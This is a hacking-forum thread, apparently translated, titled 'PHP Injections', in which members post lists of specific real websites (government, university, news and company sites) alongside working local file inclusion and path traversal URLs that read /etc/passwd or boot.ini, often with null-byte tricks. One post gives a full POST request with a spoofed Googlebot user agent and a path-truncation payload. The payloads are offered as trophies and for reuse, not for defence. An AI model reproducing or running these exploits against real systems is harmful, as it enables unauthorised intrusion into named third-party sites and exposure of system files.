PHP Injections

Discussion in 'Vulnerabilities' started by Joker-jar, 20 Apr 2007.

  1. -Hormold-

    -Hormold- Who, if not you?

    http://www.md5search.de/index.php?action=info&language=../../../../../../../../../../../../../etc/passwd%00
     
    3 people like this.
  2. HIVER

    HIVER Member

    Code:
    http://katenok.pozitiv.lv/miau.php?p=../../../../../etc/passwd
     
    1 person likes this.
  3. Kraneg

    Kraneg Elder

    .gov =)

    datamil.delaware.gov
    Code:
    http://datamil.delaware.gov/topos/download.php?file=download.php
    Strange site; according to Google's cache there used to be a root there at some point, now it's empty...

    Anyway, I looked at the title, and only noticed it after I had found this... =) eLouai's Download Script, search for it in Google, there are more like it... for example:
    Code:
    http://www.alllottoresults.com/force-download.php?file=index.php
    Code:
    http://jual-pulsa.com/download.php?file=v4/index.php
     
    #863 Kraneg, 6 Apr 2009
    Last edited: 6 Apr 2009
    3 people like this.
  4. geezer.code

    geezer.code Elder

    Look at the thread title :)
    PHP injections
    and this is a file reader.
     
    1 person likes this.
  5. Rubaka

    Rubaka Elder

    http://www.gnpbu.iip.net/index.php?file=../../../../../boot.ini
     
    1 person likes this.
  6. [underwater]

    [underwater] Member

    http://globaldiscountsclub.com/index.php?option=com_pro_desk&include_file=../../../../../etc/passwd

    http://www.gardenlaw.co.uk/cgi-bin/view_ads.cgi?category=39&process=1&template=../../../../../etc/passwd

    http://www.jedit.org/index.php?page=features/?page=../../../../../../../../../../../../../etc/passwd%00

    http://www.emsc-csem.org/index.php?page=home&sub=gmap/?page=../../../../../../../../../../../../../etc/passwd%00

    http://www.bastian-friedrich.de/yappa//index.php?album=../../../../../../../../../../../../../etc/passwd

    http://medicalcraft.com//main/index.php?content=../../../../../../../../../../../../../etc/passwd


    http://www.velocos.ch/guestbook_e/admin.php?include_path=../../../../../../../../../../../../../../../etc/passwd%00

    http://www.hotelambrosianamilano.com/index.php?page=/etc/passwd

    http://www.mfa.gov.et/View_Commentaries/View.php?Page=../../../../../../etc/passwd

    http://www.worldwidepay.com/index.php?read=../../../../../../../../../../../../../../etc/passwd

    http://www.thinprint.com/view.php?page=../../../../../etc/passwd%00

    http://www.rbgarage.com/rbg/index.php?go=../../../../etc/passwd%00

    http://www.eurekalert.org/kidsnews/page.php?page=../../../../../../../etc/passwd%00
     
    #866 [underwater], 7 Apr 2009
    Last edited: 11 Apr 2009
    1 person likes this.
  7. +StArT+

    +StArT+ Elder

    www.unicaen.fr
    Université de Caen Basse-Normandie
    -----------------------------
    Page Rank: 7
    Alexa Rank: 14.516
    -----------------------------

    Code:
    POST http://www.unicaen.fr/mrsh/irefi/expos0.php HTTP/1.0
    Accept: */*
    User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
    Host: www.unicaen.fr
    Content-type: application/x-www-form-urlencoded
    Referer: http://www.google.com/
    
    page=../../../../../etc/passwd['.str_repeat("/.",2021).']
    -----------------------------
     
    #867 +StArT+, 9 Apr 2009
    Last edited: 9 Apr 2009
    4 people like this.
  8. mailbrush

    mailbrush Well-Known Member

    http://www.balearsculturaltour.es/admin/aplicacion.php?cod=../../../../boot.ini
     
    1 person likes this.
  9. pantur

    pantur New Member

    The site is pathetic, of course, the include is local, and on top of that open_basedir gets in the way. As I understand it, you can browse within
    /var/www/virtual/peaceduke.su/. Everything beyond that is closed off, but there is access to the /tmp folder.
     
    #869 pantur, 11 Apr 2009
    Last edited: 11 Apr 2009
  10. satana8920

    satana8920 Antichat Executioner

    http://www.baikap.de/index2.php?include=../../../../../../../../../../../etc/passwd&id=2&language=EN
    Here's one from me :)
    P.S. I was actually looking for SQL injections :)
     
  11. $n@ke

    $n@ke Elder

    Windows+open_basedir+URL file-access is disabled

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    The High Council of Justice of Ukraine! How about that =)


    =====================================================
    TIC PR
    425 6

    URL file-access is disabled in the server configuration
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    Hotel 27 Pearls.
    =====================================================
    Damn, for some reason nobody is posting anything.. and this is the simplest topic of all))

    PR 6
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    Looks like the Moscow Arbitration Court! =)
     
    #871 $n@ke, 14 Apr 2009
    Last edited: 16 Apr 2009
    1 person likes this.
  12. Snap

    Snap Elder

    http://www.raskleim.ru/
    http://www.raskleim.ru/?xid=title&sm=titles/../../../../../../../etc/passwd%00

    Posting of ads, flyers and posters in Saint Petersburg.
    The site is junk, of course, but the vulnerability is there =)
     
  13. ph1l1ster

    ph1l1ster Elder

    servizioclienti.repubblica.it
    PR 7

    Code:
    http://www.servizioclienti.repubblica.it/index.php?page=../../../../../../../../../../../../../etc/passwd%00
    aphp.fr
    PR 7

    Code:
    http://www.aphp.fr/index.php?module=../../../../../../../../../../../../../etc/passwd%00
    worldsteel.org
    PR 6

    Code:
    http://www.worldsteel.org/index.php?action=../../../../../../../../../../../../../etc/passwd%00
    www.reformtheun.org
    PR 6

    Code:
    http://www.reformtheun.org/index.php?module=../../../../../../../../../../../../../etc/passwd%00
    filmmusic.net
    PR 5

    Code:
    http://www.filmmusic.net/page.php?page=../../../../../../../../../../../../../etc/passwd%00
    thewho.com
    PR 5

    Code:
    http://www.thewho.com/index.php?module=../../../../../../../../../../../../../etc/passwd%00
     
    1 person likes this.
  14. ph1l1ster

    ph1l1ster Elder

    2kgames.com
    pr6 | tic 400

    Code:
    http://www.2kgames.com/index.php?p=../../../../../../etc/passwd%00
    utbookstore.tennessee.edu

    Code:
    http://utbookstore.tennessee.edu/uccs/index.php?p=../../../../etc/passwd%00
    stefanmay.com

    Code:
    http://www.stefanmay.com/index.php?p=../../../../../etc/passwd%00
     
    4 people like this.
  15. Rubaka

    Rubaka Elder

    http://www.myspace-layouts.us/pages.php?page=../index
     
    1 person likes this.
  16. BHYCHIK

    BHYCHIK Member

    http://www.vcdh.virginia.edu/index.php?page=../../../etc/passwd%00
     
  17. S00pY

    S00pY Active Member

    Crap

    Meh
     
    #877 S00pY, 26 Apr 2009
    Last edited by a moderator: 26 Apr 2009
    1 person likes this.
  18. Gar|k

    Gar|k Moderator

    http://rastaman.tales.ru/?page=lol&menu1=1&menu2=2&smenu1=1&inctext=6

    Might be old news, I don't know,
    but the fairy tales there are cool ) also try messing with the other variables, there is a lot of interesting stuff there too
     
    _________________________
  19. winstrool

    winstrool ~~*MasterBlind*~~

    _http://www.logicnsk.ru/price/?file=../../../../../../etc/passwd&cat_id=654
     
    _________________________
    1 person likes this.
  20. udman

    udman Elder

    http://gps.ck.ua/index.php?id=../../